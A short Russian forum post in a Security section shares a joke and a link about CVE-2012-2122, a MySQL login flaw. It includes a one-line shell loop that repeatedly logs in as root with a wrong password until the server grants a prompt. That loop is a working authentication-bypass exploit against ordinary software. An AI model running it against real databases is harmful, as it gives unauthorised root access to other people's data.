LINUX.ORG.RU

Избранные сообщения vtVitus

CVE-2012-2122: китайский метод взлома MySQL

Форум — Security

Китайцы взломали сервер Пентагона. Каждый китаец попробовал один пароль. Каждый второй пароль был «Мао Цзедун». На 74357181-й попытке- сервер согласился,что у него пароль «Мао Цзедун».

!Ъ: CVE-2012-2122: A Tragically Comedic Security Flaw in MySQL

Ъ:

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

mysql>

Перемещено tazhate из talks

 , ,

beastie ()